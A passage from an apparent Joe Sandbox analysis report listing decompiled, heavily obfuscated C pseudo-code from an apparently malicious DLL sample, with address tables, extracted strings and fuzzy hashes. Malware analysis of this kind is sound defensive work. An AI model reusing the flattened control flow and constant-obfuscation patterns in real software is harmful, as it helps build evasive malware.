				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E00881005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E00883263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E0088148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E0086E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E0086F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E00870EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E008825F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x0087ccd9
0x0087ccdc
0x0087cce1
0x0087cce9
0x0087ccf1
0x0087ccf9
0x0087cd01
0x0087cd11
0x0087cd13
0x0087cd19
0x0087cd1e
0x0087cd23
0x0087cd29
0x0087cd31
0x0087cd39
0x0087cd45
0x0087cd4a
0x0087cd50
0x0087cd58
0x0087cd65
0x0087cd66
0x0087cd6a
0x0087cd72
0x0087cd7a
0x0087cd82
0x0087cd8a
0x0087cd92
0x0087cd97
0x0087cd9f
0x0087cdac
0x0087cdb0
0x0087cdb8
0x0087cdc0
0x0087cdc8
0x0087cdd0
0x0087cdd5
0x0087cddd
0x0087cde5
0x0087cdea
0x0087cdf2
0x0087cdfa
0x0087ce02
0x0087ce0a
0x0087ce0f
0x0087ce17
0x0087ce1f
0x0087ce27
0x0087ce2f
0x0087ce37
0x0087ce3f
0x0087ce44
0x0087ce4c
0x0087ce54
0x0087ce5c
0x0087ce64
0x0087ce6c
0x0087ce74
0x0087ce7c
0x0087ce84
0x0087ce8c
0x0087ce94
0x0087ce9c
0x0087cea4
0x0087ceb2
0x0087ceb6
0x0087cec0
0x0087cece
0x0087ced3
0x0087ced7
0x0087cedf
0x0087cee4
0x0087ceec
0x0087cefa
0x0087ceff
0x0087cf0a
0x0087cf0d
0x0087cf0e
0x0087cf12
0x0087cf1a
0x0087cf22
0x0087cf2a
0x0087cf32
0x0087cf37
0x0087cf3f
0x0087cf4c
0x0087cf58
0x0087cf5c
0x0087cf64
0x0087cf6c
0x0087cf74
0x0087cf7c
0x0087cf84
0x0087cf94
0x0087cfa3
0x0087cfa7
0x0087cfaf
0x0087cfb7
0x0087cfbc
0x0087cfc4
0x0087cfc9
0x0087cfd1
0x0087cfd9
0x0087cfe1
0x0087cfe9
0x0087cfe9
0x0087cfe9
0x0087cfee
0x00000000
0x0087cfee
0x0087d000
0x0087d0bc
0x0087d0c0
0x0087d0c4
0x0087d0c9
0x0087d0cc
0x0087d0cf
0x0087d0d3
0x0087d0d8
0x00000000
0x0087d0d8
0x0087d00c
0x0087d04e
0x0087d060
0x0087d065
0x0087d068
0x0087d06b
0x0087d06d
0x0087d087
0x0087d097
0x0087d09b
0x0087d09f
0x0087d0a4
0x0087d0a7
0x00000000
0x0087d0a7
0x0087d00e
0x0087d010
0x00000000
0x0087d108
0x0087d018
0x00000000
0x0087d01e
0x0087d037
0x0087d03c
0x0087d03f
0x0087d044
0x0087d04a
0x0087cfe9
0x0087cfe9
0x0087cfe9
0x00000000
0x0087cfe9
0x0087cfe9
0x0087d044
0x0087d018
0x0087d110
0x0087d110
0x0087d0e0
0x0087d0e5
0x0087d0e5
0x0087d0e5
0x00000000
0x0087cfee

Strings

#], xrefs: 0087CDF2
Cn, xrefs: 0087CE5C
Hc:, xrefs: 0087CE02
dk, xrefs: 0087CF12
$P, xrefs: 0087CD0F, 0087D023
R{L, xrefs: 0087CE84

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: cf7dad6cecf21a4f26382a9e7de53cf7f37e494d676c6423183752d8961c9455
Instruction ID: 783029770e3014646b71b9e1cd4f2a3b5f855c9fdc6e98c51ec844602a22e69c
Opcode Fuzzy Hash: cf7dad6cecf21a4f26382a9e7de53cf7f37e494d676c6423183752d8961c9455
Instruction Fuzzy Hash: 5FB12FB29083419FD358CF29C54941BFBE2FBC4748F108A2DF59996260D7B5CA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 0086F369, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0086F369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E008707F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E0087BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E008707F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E008707F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E008707F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E0087BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E008707F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}

0x0086f369
0x0086f36c
0x0086f380
0x0086f388
0x0086f38a
0x0086f38c
0x0086f38e
0x0086f38f
0x0086f390
0x0086f39c
0x0086f3a1
0x0086f3a7
0x0086f3b4
0x0086f3b7
0x0086f3bb
0x0086f3c3
0x0086f3cb
0x0086f3db
0x0086f3df
0x0086f3e7
0x0086f3ef
0x0086f3fb
0x0086f400
0x0086f406
0x0086f40e
0x0086f416
0x0086f41e
0x0086f426
0x0086f42e
0x0086f436
0x0086f43f
0x0086f444
0x0086f44a
0x0086f452
0x0086f462
0x0086f46a
0x0086f472
0x0086f477
0x0086f47f
0x0086f487
0x0086f48f
0x0086f497
0x0086f49f
0x0086f4a4
0x0086f4ac
0x0086f4b4
0x0086f4c1
0x0086f4c2
0x0086f4c6
0x0086f4ce
0x0086f4d6
0x0086f4e4
0x0086f4ea
0x0086f4ef
0x0086f4f7
0x0086f4ff
0x0086f504
0x0086f50c
0x0086f514
0x0086f51c
0x0086f524
0x0086f52c
0x0086f534
0x0086f539
0x0086f541
0x0086f549
0x0086f551
0x0086f559
0x0086f561
0x0086f569
0x0086f571
0x0086f579
0x0086f581
0x0086f589
0x0086f591
0x0086f599
0x0086f5a7
0x0086f5af
0x0086f5b3
0x0086f5bb
0x0086f5c0
0x0086f5c8
0x0086f5d0
0x0086f5d8
0x0086f5e0
0x0086f5ed
0x0086f5f1
0x0086f5f9
0x0086f5f9
0x0086f601
0x0086f601
0x0086f601
0x0086f601
0x0086f603
0x00000000
0x00000000
0x0086f605
0x0086f67d
0x00000000
0x0086f607
0x0086f60d
0x0086f66b
0x0086f66c
0x0086f671
0x0086f674
0x0086f679
0x00000000
0x0086f60f
0x0086f615
0x0086f71a
0x0086f61b
0x0086f621
0x0086f651
0x0086f652
0x0086f657
0x0086f65a
0x0086f65f
0x00000000
0x0086f623
0x0086f629
0x00000000
0x0086f62f
0x0086f637
0x0086f638
0x0086f63d
0x0086f640
0x0086f645
0x00000000
0x0086f645
0x0086f629
0x0086f621
0x0086f615
0x0086f60d
0x0086f71d
0x0086f725
0x0086f725
0x0086f687
0x0086f6e1
0x0086f6e2
0x0086f6e7
0x0086f6ea
0x0086f6ef
0x00000000
0x0086f689
0x0086f68b
0x0086f6c5
0x0086f6ca
0x0086f6cd
0x0086f6d2
0x00000000
0x0086f68d
0x0086f693
0x00000000
0x0086f695
0x0086f69d
0x0086f69e
0x0086f6a3
0x0086f6a6
0x0086f6ab
0x00000000
0x0086f6ab
0x0086f693
0x0086f68b
0x00000000
0x0086f6f1
0x0086f6f1
0x00000000

Strings

a?E, xrefs: 0086F462
rCx/, xrefs: 0086F5D8
l0, xrefs: 0086F599
_3, xrefs: 0086F48F
,>, xrefs: 0086F42E
Uo>, xrefs: 0086F571

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,>$Uo>$_3$a?E$l0$rCx/
API String ID: 0-1805074986
Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction ID: 28826dc316d9de5352c0b8ad568e0a56f51efdfcb8ea4fc7fc8f456390fd0180
Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction Fuzzy Hash: E89155B25083409BC358CF29D58940FBBF1FBE5748F154A2DFA8A96261D3B6D9098F43

Uniqueness

Uniqueness Score: -1.00%

Function 00878806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00878806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
							_t174 = E00882BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = E00882BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E00879D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											E008622A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = E00882BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = E00882BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}

0x00878810
0x00878817
0x00878818
0x0087881f
0x00878820
0x00878821
0x00878826
0x0087882e
0x00878831
0x00878839
0x0087883b
0x00878841
0x00878845
0x0087884a
0x00878858
0x0087885d
0x00878863
0x00878868
0x00878870
0x0087887d
0x00878880
0x00878884
0x0087888c
0x00878899
0x0087889d
0x008788aa
0x008788ae
0x008788b6
0x008788be
0x008788c6
0x008788ce
0x008788d6
0x008788de
0x008788ee
0x008788f2
0x008788fa
0x00878902
0x0087890a
0x00878912
0x0087891a
0x00878922
0x0087892a
0x00878932
0x00878937
0x0087893f
0x00878947
0x0087894f
0x00878957
0x00878964
0x00878965
0x00878969
0x00878971
0x0087897f
0x00878983
0x0087898b
0x00878993
0x0087899b
0x008789a8
0x008789ac
0x008789b4
0x008789c4
0x008789d1
0x008789d5
0x008789d9
0x008789de
0x008789e6
0x008789ee
0x008789f6
0x008789fe
0x00878a06
0x00878a0b
0x00878a13
0x00878a1b
0x00878a23
0x00878a2b
0x00878a33
0x00878a37
0x00878a3f
0x00878a47
0x00878a47
0x00878a51
0x00878b22
0x00878b27
0x00878b2a
0x00878b2c
0x00878b2e
0x00000000
0x00878b2e
0x00878a57
0x00878a5d
0x00878af7
0x00878afc
0x00878aff
0x00878b01
0x00878b07
0x00000000
0x00878b07
0x00878a63
0x00878a69
0x00878b8c
0x00878b8e
0x00878a6f
0x00878a75
0x00878ad9
0x00000000
0x00878a77
0x00878a7d
0x00878ac7
0x00878acc
0x00878acf
0x00000000
0x00878a7f
0x00878a85
0x00000000
0x00878a8b
0x00878a9f
0x00878aa4
0x00878aa9
0x00878aaf
0x00000000
0x00878aaf
0x00878aa9
0x00878a85
0x00878a7d
0x00878a75
0x00878a69
0x00878a5d
0x00878b92
0x00878b9d
0x00878b9d
0x00878b4c
0x00878b51
0x00878b54
0x00878b56
0x00878b62
0x00000000
0x00878b58
0x00878b58
0x00000000
0x00878b58
0x00000000
0x00878b67
0x00878b67
0x00878b67
0x00000000

Strings

d%, xrefs: 0087898B
\:, xrefs: 00878937
>_), xrefs: 00878912
Eh}, xrefs: 008788FA
$P, xrefs: 0087880E
i*, xrefs: 008788CE

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: d4820d34e34a49146296e6d5ecc79021d771a2e6ade649ed5cd36b22a14eaf2b
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: C09141B1508301DFD718CE65C58992BFBE1FBC4718F00892EF59A962A4D7B5CA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 0086BFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0086BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E0087FE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E00881538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E0087C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E008845CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x0086bfc2
0x0086bfc9
0x0086bfcd
0x0086bfcf
0x0086bfd0
0x0086bfd2
0x0086bfd7
0x0086bfdf
0x0086bfe2
0x0086bfec
0x0086bff4
0x0086bff6
0x0086bffe
0x0086c003
0x0086c00b
0x0086c013
0x0086c01b
0x0086c029
0x0086c02e
0x0086c034
0x0086c03c
0x0086c044
0x0086c04c
0x0086c054
0x0086c05c
0x0086c064
0x0086c069
0x0086c071
0x0086c079
0x0086c07d
0x0086c07e
0x0086c080
0x0086c084
0x0086c08c
0x0086c094
0x0086c09c
0x0086c0a4
0x0086c0ac
0x0086c0b1
0x0086c0b9
0x0086c0c1
0x0086c0c9
0x0086c0d6
0x0086c0da
0x0086c0e2
0x0086c0ea
0x0086c0fa
0x0086c102
0x0086c10a
0x0086c112
0x0086c11a
0x0086c122
0x0086c12a
0x0086c132
0x0086c13a
0x0086c142
0x0086c14a
0x0086c152
0x0086c15a
0x0086c162
0x0086c167
0x0086c16b
0x0086c173
0x0086c17b
0x0086c180
0x0086c188
0x0086c190
0x0086c198
0x0086c1a0
0x0086c1a4
0x0086c1ac
0x0086c1b4
0x0086c1bc
0x0086c1bc
0x0086c1ca
0x0086c27c
0x0086c1d0
0x0086c1d6
0x0086c208
0x0086c20d
0x0086c210
0x0086c212
0x00000000
0x0086c1d8
0x0086c1de
0x00000000
0x0086c1e4
0x0086c1e4
0x00000000
0x0086c1e4
0x0086c1de
0x0086c1d6
0x0086c282
0x0086c28b
0x0086c28b
0x0086c23f
0x0086c247
0x0086c24c
0x0086c24e
0x0086c254
0x0086c260
0x00000000
0x0086c256
0x0086c256
0x00000000
0x0086c256
0x00000000
0x0086c265
0x0086c265
0x00000000

Strings

ODg, xrefs: 0086C0C1
jA, xrefs: 0086C15A
j-N, xrefs: 0086C054
3$, xrefs: 0086C05C
/c, xrefs: 0086C11A
Te;, xrefs: 0086C122

Memory Dump Source

